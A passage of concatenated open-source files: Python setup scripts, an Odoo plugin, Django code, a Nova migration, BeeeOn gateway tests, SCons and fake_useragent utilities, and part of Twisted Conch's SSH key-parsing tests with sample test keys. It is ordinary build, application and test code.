lang = filename[:-3]
src = os.path.join(PO_DIR, filename)
dest_path = os.path.join('build', 'locale', lang, 'LC_MESSAGES')
dest = os.path.join(dest_path, I18N_DOMAIN + '.mo')
if not os.path.exists(dest_path):
os.makedirs(dest_path)
if not os.path.exists(dest):
print('Compiling {}'.format(src))
subprocess.call(["msgfmt", src, "--output-file", dest])
else:
src_mtime = os.stat(src)[8]
dest_mtime = os.stat(dest)[8]
if src_mtime > dest_mtime:
print('Compiling {}'.format(src))
subprocess.call(["msgfmt", src, "--output-file", dest])
class install_data(_install_data):
def run(self):
for filename in os.listdir(PO_DIR):
if not filename.endswith('.po'):
continue
lang = filename[:-3]
lang_dir = os.path.join('share', 'locale', lang, 'LC_MESSAGES')
lang_file = os.path.join('build', 'locale', lang, 'LC_MESSAGES', I18N_DOMAIN + '.mo')
self.data_files.append((lang_dir, [lang_file]))
_install_data.run(self)
class update_pot(cmd.Command):
description = 'Update template for translators'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
cmd = ['xgettext', '--language=Python', '--keyword=_', '--package-name', I18N_DOMAIN,
'--output', 'po/{}.pot'.format(I18N_DOMAIN)]
for path, names, filenames in os.walk(os.path.join(os.curdir, 'umake')):
for f in filenames:
if f.endswith('.py'):
cmd.append(os.path.join(path, f))
subprocess.call(cmd)
class update_po(cmd.Command):
description = 'Update po from pot file'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
source_pot = os.path.join(os.curdir, 'po', '{}.pot'.format(I18N_DOMAIN))
for po_file in glob(os.path.join(os.curdir, 'po', '*.po')):
subprocess.check_call(["msgmerge", "-U", po_file, source_pot])
setup(
name="Ubuntu Make",
version=get_version(),
packages=find_packages(exclude=["tests*"]),
package_data={},
entry_points={
'console_scripts': [
'umake = umake:main',
'udtc = umake:main'
],
},
data_files=[
('lib/python3/dist-packages/umake', ['umake/version']),
("share/ubuntu-make/log-confs", glob('log-confs/*.yaml')),
('share/zsh/vendor-completions', ['confs/completions/_umake']),
],
# In addition to run all nose tests, that will as well show python warnings
test_suite="nose.collector",
cmdclass={
'build': build,
'build_trans': build_trans,
'install_data': install_data,
'update_pot': update_pot,
'update_po': update_po,
}
)
| gpl-3.0 |
codekaki/odoo | addons/plugin_outlook/plugin_outlook.py | 92 | 2079 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields
from openerp.osv import osv
from openerp import addons
import base64
class outlook_installer(osv.osv_memory):
_name = 'outlook.installer'
_inherit = 'res.config.installer'
_columns = {
'plugin32': fields.char('Outlook Plug-in 32bits', size=256, readonly=True, help="Outlook plug-in file. Save this file and install it in Outlook."),
'plugin64': fields.char('Outlook Plug-in 64bits', size=256, readonly=True, help="Outlook plug-in file. Save this file and install it in Outlook."),
}
def default_get(self, cr, uid, fields, context=None):
res = super(outlook_installer, self).default_get(cr, uid, fields, context)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
res['plugin32'] = base_url + '/plugin_outlook/static/openerp-outlook-plugin/OpenERPOutlookPluginSetup32.msi'
res['plugin64'] = base_url + '/plugin_outlook/static/openerp-outlook-plugin/OpenERPOutlookPluginSetup64.msi'
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
arkanister/minitickets | lib/utils/html/templatetags/icons.py | 1 | 2009 | # -*- coding: utf-8 -*-
from django import template
from django.template import TemplateSyntaxError, Node
from ..icons.base import Icon
from ..tags import token_kwargs, resolve_kwargs
register = template.Library()
class IconNode(Node):
def __init__(self, _icon, kwargs=None):
super(IconNode, self).__init__()
self.icon = _icon
self.kwargs = kwargs or {}
def render(self, context):
icon = self.icon.resolve(context)
if isinstance(icon, Icon):
return icon.as_html()
attrs = resolve_kwargs(self.kwargs, context)
prefix = attrs.pop('prefix', None)
content = attrs.pop('content', None)
html_tag = attrs.pop('html_tag', None)
icon = Icon(icon, prefix=prefix, content=content,
html_tag=html_tag, attrs=attrs)
return icon.as_html()
@register.tag
def icon(parser, token):
"""
Render a HTML icon.
The tag can be given either a `.Icon` object or a name of the icon.
An optional second argument can specify the icon prefix to use.
An optional third argument can specify the icon html tag to use.
An optional fourth argument can specify the icon content to use.
Others arguments can specify any html attribute to use.
Example::
{% icon 'icon' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
{% icon 'icon' 'prefix'='fa-' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
{% icon 'icon' 'prefix'='fa-' 'html_tag'='b' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
{% icon 'icon' 'prefix'='fa-' 'html_tag'='b' 'content'='R$' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
"""
bits = token.split_contents()
try:
tag, _icon = bits.pop(0), parser.compile_filter(bits.pop(0))
except ValueError:
raise TemplateSyntaxError("'%s' must be given a icon." % bits[0])
kwargs = {}
# split optional args
if len(bits):
kwargs = token_kwargs(bits, parser)
return IconNode(_icon, kwargs=kwargs) | apache-2.0 |
JioCloud/nova | nova/db/sqlalchemy/migrate_repo/versions/227_fix_project_user_quotas_resource_length.py | 81 | 1366 | # Copyright 2013 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import MetaData, String, Table
def upgrade(migrate_engine):
meta = MetaData(bind=migrate_engine)
table = Table('project_user_quotas', meta, autoload=True)
col_resource = getattr(table.c, 'resource')
if col_resource.type.length == 25:
# The resource of project_user_quotas table had been changed to
# invalid length(25) since I56ad98d3702f53fe8cfa94093fea89074f7a5e90.
# The following code fixes the length for the environments which are
# deployed after I56ad98d3702f53fe8cfa94093fea89074f7a5e90.
col_resource.alter(type=String(255))
table.update().where(table.c.resource == 'injected_file_content_byt')\
.values(resource='injected_file_content_bytes').execute()
| apache-2.0 |
isaacbernat/awis | setup.py | 1 | 1887 | from setuptools import setup, find_packages
# from codecs import open
# from os import path
# here = path.abspath(path.dirname(__file__))
# # Get the long description from the README file
# with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
# long_description = f.read()
setup(
# Application name:
name="myawis",
# Version number (initial):
version="0.2.4",
# Application author details:
author="Ashim Lamichhane",
author_email="punchedrock@gmail.com",
# Packages
packages=['myawis'],
# data_files
data_files=[('awis', ['LICENSE.txt', 'README.rst'])],
# Include additional files into the package
include_package_data=True,
# Details
url="https://github.com/ashim888/awis",
# Keywords
keywords='python awis api call',
#
license='GNU General Public License v3.0',
description="A simple AWIS python wrapper",
long_description=open('README.rst').read(),
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 2 - Pre-Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
# Pick your license as you wish (should match "license" above)
'License :: Public Domain',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
install_requires=[
"requests",
"beautifulsoup4",
"lxml",
],
entry_points={
'console_scripts': [
'myawis=myawis:main',
],
},
)
| gpl-3.0 |
arc6373/django-rest-swagger | tests/cigar_example/cigar_example/app/models.py | 19 | 1274 | from django.db import models
class Cigar(models.Model):
FORM_CHOICES = (
('parejo', 'Parejo'),
('torpedo', 'Torpedo'),
('pyramid', 'Pyramid'),
('perfecto', 'Perfecto'),
('presidente', 'Presidente'),
)
name = models.CharField(max_length=25, help_text='Cigar Name')
colour = models.CharField(max_length=30, default="Brown")
form = models.CharField(max_length=20, choices=FORM_CHOICES, default='parejo')
gauge = models.IntegerField()
length = models.IntegerField()
price = models.DecimalField(decimal_places=2, max_digits=5)
notes = models.TextField()
manufacturer = models.ForeignKey('Manufacturer')
def get_absolute_url(self):
return "/api/cigars/%i/" % self.id
class Manufacturer(models.Model):
name = models.CharField(max_length=25, help_text='name of company')
country = models.ForeignKey('Country')
def __unicode__(self):
return self.name
class Country(models.Model):
name = models.CharField(max_length=25, null=False, blank=True)
def __unicode__(self):
return self.name
class Meta:
verbose_name_plural = "Countries"
class Jambalaya(models.Model):
recipe = models.CharField(max_length=256, null=False, blank=False)
| bsd-2-clause |
BeeeOn/server | t/gws/t1006-sensor-data-export.py | 1 | 4343 | #! /usr/bin/env python3
import config
config.import_libs()
import unittest
import websocket
import json
import time
import uuid
from gws import assureIsClosed, assureNotClosed, registerGateway, ZMQConnection
class TestSensorData(unittest.TestCase):
def setUp(self):
self.zmq = ZMQConnection(config.gws_zmq_endpoint)
self.zmq.accept(lambda m: "gateway_id" in m)
self.zmq.open()
self.ws = websocket.WebSocket()
self.ws.connect(config.gws_ws_uri)
registerGateway(self, self.ws, config.gateway_id)
event = self.zmq.pop_data()
self.assertEqual("on-connected", event["event"])
self.assertEqual(config.gateway_id, event["gateway_id"])
def tearDown(self):
self.ws.close()
try:
event = self.zmq.pop_data()
self.assertEqual("on-disconnected", event["event"])
self.assertEqual(config.gateway_id, event["gateway_id"])
finally:
self.zmq.close()
"""
Server just confirms that it received valid sensor data message,
but nothing more can be determined from its response
"""
def test1_export_successful(self):
id = str(uuid.uuid4())
timestamp = int(time.time() * 1000000)
msg = json.dumps(
{
"message_type" : "sensor_data_export",
"id" : id,
"data" : [
{
"device_id" : "0xa32d27aa5e94ecfd",
"timestamp" : timestamp,
"values": [
{
"module_id" : "0",
"value" : 30.0,
"valid" : "true"
},
{
"module_id" : "1",
"valid" : "false"
},
{
"module_id" : "2",
"value" : 60.0,
"valid" : "true"
}
]
}
]
}
)
self.ws.send(msg)
msg = json.loads(self.ws.recv())
self.assertEqual("sensor_data_confirm", msg["message_type"])
self.assertEqual(id, msg["id"])
assureNotClosed(self, self.ws)
event = self.zmq.pop_data()
self.assertEqual("on-sensor-data", event["event"])
self.assertEqual(config.gateway_id, event["gateway_id"])
self.assertEqual("0xa32d27aa5e94ecfd", event["device_id"])
self.assertEqual(timestamp, event["timestamp"])
self.assertEqual(30, event["data"]["0"])
self.assertIsNone(event["data"]["1"])
self.assertEqual(60, event["data"]["2"])
"""
Even if we send an invalid export message, we get just "confirm" response.
This test is semi-automatic, it requires to check the server log.
"""
def test2_export_fails_due_to_unexisting_device(self):
id = str(uuid.uuid4())
msg = json.dumps(
{
"message_type" : "sensor_data_export",
"id" : id,
"data" : [
{
"device_id" : "0xa32d275555555555",
"timestamp" : 0,
"values": [
{
"module_id" : "5",
"value" : -1230.0,
"valid" : "true"
},
{
"module_id" : "22",
"valid" : "false"
},
{
"module_id" : "89",
"value" : 3460.132,
"valid" : "true"
}
]
}
]
}
)
self.ws.send(msg)
msg = json.loads(self.ws.recv())
self.assertEqual("sensor_data_confirm", msg["message_type"])
self.assertEqual(id, msg["id"])
assureNotClosed(self, self.ws)
"""
Send conflicting data (same timestamp). We cannot test anything there
automatically. But it allows at least a semi-automatic test.
"""
def test3_export_fails_due_to_conflicts(self):
id = str(uuid.uuid4())
timestamp = int(time.time() * 1000000)
msg = json.dumps(
{
"message_type" : "sensor_data_export",
"id" : id,
"data" : [
{
"device_id" : "0xa32d27aa5e94ecfd",
"timestamp" : timestamp,
"values": [
{
"module_id" : "0",
"value" : 30.0,
"valid" : "true"
},
{
"module_id" : "0",
"valid" : "false"
}
]
}
]
}
)
self.ws.send(msg)
msg = json.loads(self.ws.recv())
self.assertEqual("sensor_data_confirm", msg["message_type"])
self.assertEqual(id, msg["id"])
assureNotClosed(self, self.ws)
event = self.zmq.pop_data()
self.assertEqual("on-sensor-data", event["event"])
self.assertEqual(config.gateway_id, event["gateway_id"])
self.assertEqual("0xa32d27aa5e94ecfd", event["device_id"])
self.assertEqual(timestamp, event["timestamp"])
self.assertEqual(30, event["data"]["0"])
if __name__ == '__main__':
import sys
import taprunner
unittest.main(testRunner=taprunner.TAPTestRunner(stream = sys.stdout))
| bsd-3-clause |
faarwa/EngSocP5 | zxing/cpp/scons/scons-local-2.0.0.final.0/SCons/Tool/dvips.py | 34 | 3452 | """SCons.Tool.dvips
Tool-specific initialization for dvips.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/dvips.py 5023 2010/06/14 22:05:46 scons"
import SCons.Action
import SCons.Builder
import SCons.Tool.dvipdf
import SCons.Util
def DviPsFunction(target = None, source= None, env=None):
result = SCons.Tool.dvipdf.DviPdfPsFunction(PSAction,target,source,env)
return result
def DviPsStrFunction(target = None, source= None, env=None):
"""A strfunction for dvipdf that returns the appropriate
command string for the no_exec options."""
if env.GetOption("no_exec"):
result = env.subst('$PSCOM',0,target,source)
else:
result = ''
return result
PSAction = None
DVIPSAction = None
PSBuilder = None
def generate(env):
"""Add Builders and construction variables for dvips to an Environment."""
global PSAction
if PSAction is None:
PSAction = SCons.Action.Action('$PSCOM', '$PSCOMSTR')
global DVIPSAction
if DVIPSAction is None:
DVIPSAction = SCons.Action.Action(DviPsFunction, strfunction = DviPsStrFunction)
global PSBuilder
if PSBuilder is None:
PSBuilder = SCons.Builder.Builder(action = PSAction,
prefix = '$PSPREFIX',
suffix = '$PSSUFFIX',
src_suffix = '.dvi',
src_builder = 'DVI',
single_source=True)
env['BUILDERS']['PostScript'] = PSBuilder
env['DVIPS'] = 'dvips'
env['DVIPSFLAGS'] = SCons.Util.CLVar('')
# I'm not quite sure I got the directories and filenames right for variant_dir
# We need to be in the correct directory for the sake of latex \includegraphics eps included files.
env['PSCOM'] = 'cd ${TARGET.dir} && $DVIPS $DVIPSFLAGS -o ${TARGET.file} ${SOURCE.file}'
env['PSPREFIX'] = ''
env['PSSUFFIX'] = '.ps'
def exists(env):
return env.Detect('dvips')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| gpl-3.0 |
Mhynlo/SickRage | lib/fake_useragent/utils.py | 21 | 3284 | from __future__ import absolute_import, unicode_literals
import codecs
import json
import os
import re
from time import sleep
from threading import Lock
try: # Python 2
from urllib2 import urlopen, Request, URLError
from urllib import quote_plus
except ImportError: # Python 3
from urllib.request import urlopen, Request
from urllib.parse import quote_plus
from urllib.error import URLError
def get(url):
with get.lock:
request = Request(url)
attempt = 0
while attempt < settings.HTTP_RETRIES:
attempt += 1
try:
return urlopen(request, timeout=settings.HTTP_TIMEOUT).read()
except URLError:
if attempt == settings.HTTP_RETRIES:
raise
else:
sleep(settings.HTTP_DELAY)
get.lock = Lock()
def get_browsers():
"""
very very hardcoded/dirty re/split stuff, but no dependencies
"""
html = get(settings.BROWSERS_STATS_PAGE)
html = html.decode('windows-1252')
html = html.split('<table class="w3-table-all notranslate">')[1]
html = html.split('</table>')[0]
browsers = re.findall(r'\.asp">(.+?)<', html, re.UNICODE)
browsers = [
settings.OVERRIDES.get(browser, browser) for browser in browsers
]
browsers_statistics = re.findall(
r'td\sclass="right">(.+?)\s', html, re.UNICODE
)
return list(zip(browsers, browsers_statistics))
def get_browser_versions(browser):
"""
very very hardcoded/dirty re/split stuff, but no dependencies
"""
html = get(settings.BROWSER_BASE_PAGE.format(browser=quote_plus(browser)))
html = html.decode('iso-8859-1')
html = html.split('<div id=\'liste\'>')[1]
html = html.split('</div>')[0]
browsers_iter = re.finditer(r'\?id=\d+\'>(.+?)</a', html, re.UNICODE)
browsers = []
for browser in browsers_iter:
if 'more' in browser.group(1).lower():
continue
browsers.append(browser.group(1))
if len(browsers) == settings.BROWSERS_COUNT_LIMIT:
break
return browsers
def load():
browsers_dict = {}
randomize_dict = {}
for item in get_browsers():
browser, percent = item
browser_key = browser
for value, replacement in settings.REPLACEMENTS.items():
browser_key = browser_key.replace(value, replacement)
browser_key = browser_key.lower()
browsers_dict[browser_key] = get_browser_versions(browser)
for _ in range(int(float(percent) * 10)):
randomize_dict[str(len(randomize_dict))] = browser_key
return {
'browsers': browsers_dict,
'randomize': randomize_dict
}
def write(data):
with codecs.open(settings.DB, encoding='utf-8', mode='wb+',) as fp:
json.dump(data, fp)
def read():
with codecs.open(settings.DB, encoding='utf-8', mode='rb',) as fp:
return json.load(fp)
def exist():
return os.path.isfile(settings.DB)
def rm():
if exist():
os.remove(settings.DB)
def update():
if exist():
rm()
write(load())
def load_cached():
if not exist():
update()
return read()
from fake_useragent import settings # noqa # isort:skip
| gpl-3.0 |
hendradarwin/VTK | ThirdParty/Twisted/twisted/conch/test/test_keys.py | 27 | 27826 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.ssh.keys}.
"""
try:
import Crypto.Cipher.DES3
except ImportError:
# we'll have to skip these tests without PyCypto and pyasn1
Crypto = None
try:
import pyasn1
except ImportError:
pyasn1 = None
if Crypto and pyasn1:
from twisted.conch.ssh import keys, common, sexpy
import os, base64
from hashlib import sha1
from twisted.conch.test import keydata
from twisted.python import randbytes
from twisted.trial import unittest
class HelpersTestCase(unittest.TestCase):
if Crypto is None:
skip = "cannot run w/o PyCrypto"
if pyasn1 is None:
skip = "Cannot run without PyASN1"
def setUp(self):
self._secureRandom = randbytes.secureRandom
randbytes.secureRandom = lambda x: '\x55' * x
def tearDown(self):
randbytes.secureRandom = self._secureRandom
self._secureRandom = None
def test_pkcs1(self):
"""
Test Public Key Cryptographic Standard #1 functions.
"""
data = 'ABC'
messageSize = 6
self.assertEqual(keys.pkcs1Pad(data, messageSize),
'\x01\xff\x00ABC')
hash = sha1().digest()
messageSize = 40
self.assertEqual(keys.pkcs1Digest('', messageSize),
'\x01\xff\xff\xff\x00' + keys.ID_SHA1 + hash)
def _signRSA(self, data):
key = keys.Key.fromString(keydata.privateRSA_openssh)
sig = key.sign(data)
return key.keyObject, sig
def _signDSA(self, data):
key = keys.Key.fromString(keydata.privateDSA_openssh)
sig = key.sign(data)
return key.keyObject, sig
def test_signRSA(self):
"""
Test that RSA keys return appropriate signatures.
"""
data = 'data'
key, sig = self._signRSA(data)
sigData = keys.pkcs1Digest(data, keys.lenSig(key))
v = key.sign(sigData, '')[0]
self.assertEqual(sig, common.NS('ssh-rsa') + common.MP(v))
return key, sig
def test_signDSA(self):
"""
Test that DSA keys return appropriate signatures.
"""
data = 'data'
key, sig = self._signDSA(data)
sigData = sha1(data).digest()
v = key.sign(sigData, '\x55' * 19)
self.assertEqual(sig, common.NS('ssh-dss') + common.NS(
Crypto.Util.number.long_to_bytes(v[0], 20) +
Crypto.Util.number.long_to_bytes(v[1], 20)))
return key, sig
def test_objectType(self):
"""
Test that objectType, returns the correct type for objects.
"""
self.assertEqual(keys.objectType(keys.Key.fromString(
keydata.privateRSA_openssh).keyObject), 'ssh-rsa')
self.assertEqual(keys.objectType(keys.Key.fromString(
keydata.privateDSA_openssh).keyObject), 'ssh-dss')
self.assertRaises(keys.BadKeyError, keys.objectType, None)
class KeyTestCase(unittest.TestCase):
if Crypto is None:
skip = "cannot run w/o PyCrypto"
if pyasn1 is None:
skip = "Cannot run without PyASN1"
def setUp(self):
self.rsaObj = Crypto.PublicKey.RSA.construct((1L, 2L, 3L, 4L, 5L))
self.dsaObj = Crypto.PublicKey.DSA.construct((1L, 2L, 3L, 4L, 5L))
self.rsaSignature = ('\x00\x00\x00\x07ssh-rsa\x00'
'\x00\x00`N\xac\xb4@qK\xa0(\xc3\xf2h \xd3\xdd\xee6Np\x9d_'
'\xb0>\xe3\x0c(L\x9d{\txUd|!\xf6m\x9c\xd3\x93\x842\x7fU'
'\x05\xf4\xf7\xfaD\xda\xce\x81\x8ea\x7f=Y\xed*\xb7\xba\x81'
'\xf2\xad\xda\xeb(\x97\x03S\x08\x81\xc7\xb1\xb7\xe6\xe3'
'\xcd*\xd4\xbd\xc0wt\xf7y\xcd\xf0\xb7\x7f\xfb\x1e>\xf9r'
'\x8c\xba')
self.dsaSignature = ('\x00\x00\x00\x07ssh-dss\x00\x00'
'\x00(\x18z)H\x8a\x1b\xc6\r\xbbq\xa2\xd7f\x7f$\xa7\xbf'
'\xe8\x87\x8c\x88\xef\xd9k\x1a\x98\xdd{=\xdec\x18\t\xe3'
'\x87\xa9\xc72h\x95')
self.oldSecureRandom = randbytes.secureRandom
randbytes.secureRandom = lambda x: '\xff' * x
self.keyFile = self.mktemp()
file(self.keyFile, 'wb').write(keydata.privateRSA_lsh)
def tearDown(self):
randbytes.secureRandom = self.oldSecureRandom
del self.oldSecureRandom
os.unlink(self.keyFile)
def test__guessStringType(self):
"""
Test that the _guessStringType method guesses string types
correctly.
"""
self.assertEqual(keys.Key._guessStringType(keydata.publicRSA_openssh),
'public_openssh')
self.assertEqual(keys.Key._guessStringType(keydata.publicDSA_openssh),
'public_openssh')
self.assertEqual(keys.Key._guessStringType(
keydata.privateRSA_openssh), 'private_openssh')
self.assertEqual(keys.Key._guessStringType(
keydata.privateDSA_openssh), 'private_openssh')
self.assertEqual(keys.Key._guessStringType(keydata.publicRSA_lsh),
'public_lsh')
self.assertEqual(keys.Key._guessStringType(keydata.publicDSA_lsh),
'public_lsh')
self.assertEqual(keys.Key._guessStringType(keydata.privateRSA_lsh),
'private_lsh')
self.assertEqual(keys.Key._guessStringType(keydata.privateDSA_lsh),
'private_lsh')
self.assertEqual(keys.Key._guessStringType(
keydata.privateRSA_agentv3), 'agentv3')
self.assertEqual(keys.Key._guessStringType(
keydata.privateDSA_agentv3), 'agentv3')
self.assertEqual(keys.Key._guessStringType(
'\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'),
'blob')
self.assertEqual(keys.Key._guessStringType(
'\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x01'),
'blob')
self.assertEqual(keys.Key._guessStringType('not a key'),
None)
def _testPublicPrivateFromString(self, public, private, type, data):
self._testPublicFromString(public, type, data)
self._testPrivateFromString(private, type, data)
def _testPublicFromString(self, public, type, data):
publicKey = keys.Key.fromString(public)
self.assertTrue(publicKey.isPublic())
self.assertEqual(publicKey.type(), type)
for k, v in publicKey.data().items():
self.assertEqual(data[k], v)
def _testPrivateFromString(self, private, type, data):
privateKey = keys.Key.fromString(private)
self.assertFalse(privateKey.isPublic())
self.assertEqual(privateKey.type(), type)
for k, v in data.items():
self.assertEqual(privateKey.data()[k], v)
def test_fromOpenSSH(self):
"""
Test that keys are correctly generated from OpenSSH strings.
"""
self._testPublicPrivateFromString(keydata.publicRSA_openssh,
keydata.privateRSA_openssh, 'RSA', keydata.RSAData)
self.assertEqual(keys.Key.fromString(
keydata.privateRSA_openssh_encrypted,
passphrase='encrypted'),
keys.Key.fromString(keydata.privateRSA_openssh))
self.assertEqual(keys.Key.fromString(
keydata.privateRSA_openssh_alternate),
keys.Key.fromString(keydata.privateRSA_openssh))
self._testPublicPrivateFromString(keydata.publicDSA_openssh,
keydata.privateDSA_openssh, 'DSA', keydata.DSAData)
def test_fromOpenSSH_with_whitespace(self):
"""
If key strings have trailing whitespace, it should be ignored.
"""
# from bug #3391, since our test key data doesn't have
# an issue with appended newlines
privateDSAData = """-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQDylESNuc61jq2yatCzZbenlr9llG+p9LhIpOLUbXhhHcwC6hrh
EZIdCKqTO0USLrGoP5uS9UHAUoeN62Z0KXXWTwOWGEQn/syyPzNJtnBorHpNUT9D
Qzwl1yUa53NNgEctpo4NoEFOx8PuU6iFLyvgHCjNn2MsuGuzkZm7sI9ZpQIVAJiR
9dPc08KLdpJyRxz8T74b4FQRAoGAGBc4Z5Y6R/HZi7AYM/iNOM8su6hrk8ypkBwR
a3Dbhzk97fuV3SF1SDrcQu4zF7c4CtH609N5nfZs2SUjLLGPWln83Ysb8qhh55Em
AcHXuROrHS/sDsnqu8FQp86MaudrqMExCOYyVPE7jaBWW+/JWFbKCxmgOCSdViUJ
esJpBFsCgYEA7+jtVvSt9yrwsS/YU1QGP5wRAiDYB+T5cK4HytzAqJKRdC5qS4zf
C7R0eKcDHHLMYO39aPnCwXjscisnInEhYGNblTDyPyiyNxAOXuC8x7luTmwzMbNJ
/ow0IqSj0VF72VJN9uSoPpFd4lLT0zN8v42RWja0M8ohWNf+YNJluPgCFE0PT4Vm
SUrCyZXsNh6VXwjs3gKQ
-----END DSA PRIVATE KEY-----"""
self.assertEqual(keys.Key.fromString(privateDSAData),
keys.Key.fromString(privateDSAData + '\n'))
def test_fromNewerOpenSSH(self):
"""
Newer versions of OpenSSH generate encrypted keys which have a longer
IV than the older versions. These newer keys are also loaded.
"""
key = keys.Key.fromString(keydata.privateRSA_openssh_encrypted_aes,
passphrase='testxp')
self.assertEqual(key.type(), 'RSA')
key2 = keys.Key.fromString(
keydata.privateRSA_openssh_encrypted_aes + '\n',
passphrase='testxp')
self.assertEqual(key, key2)
def test_fromLSH(self):
"""
Test that keys are correctly generated from LSH strings.
"""
self._testPublicPrivateFromString(keydata.publicRSA_lsh,
keydata.privateRSA_lsh, 'RSA', keydata.RSAData)
self._testPublicPrivateFromString(keydata.publicDSA_lsh,
keydata.privateDSA_lsh, 'DSA', keydata.DSAData)
sexp = sexpy.pack([['public-key', ['bad-key', ['p', '2']]]])
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
data='{'+base64.encodestring(sexp)+'}')
sexp = sexpy.pack([['private-key', ['bad-key', ['p', '2']]]])
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
sexp)
def test_fromAgentv3(self):
"""
Test that keys are correctly generated from Agent v3 strings.
"""
self._testPrivateFromString(keydata.privateRSA_agentv3, 'RSA',
keydata.RSAData)
self._testPrivateFromString(keydata.privateDSA_agentv3, 'DSA',
keydata.DSAData)
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
'\x00\x00\x00\x07ssh-foo'+'\x00\x00\x00\x01\x01'*5)
def test_fromStringErrors(self):
"""
keys.Key.fromString should raise BadKeyError when the key is invalid.
"""
self.assertRaises(keys.BadKeyError, keys.Key.fromString, '')
# no key data with a bad key type
self.assertRaises(keys.BadKeyError, keys.Key.fromString, '',
'bad_type')
# trying to decrypt a key which doesn't support encryption
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
keydata.publicRSA_lsh, passphrase = 'unencrypted')
# trying to decrypt a key with the wrong passphrase
self.assertRaises(keys.EncryptedKeyError, keys.Key.fromString,
keys.Key(self.rsaObj).toString('openssh', 'encrypted'))
# key with no key data
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
'-----BEGIN RSA KEY-----\nwA==\n')
# key with invalid DEK Info
self.assertRaises(
keys.BadKeyError, keys.Key.fromString,
"""-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: weird type
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
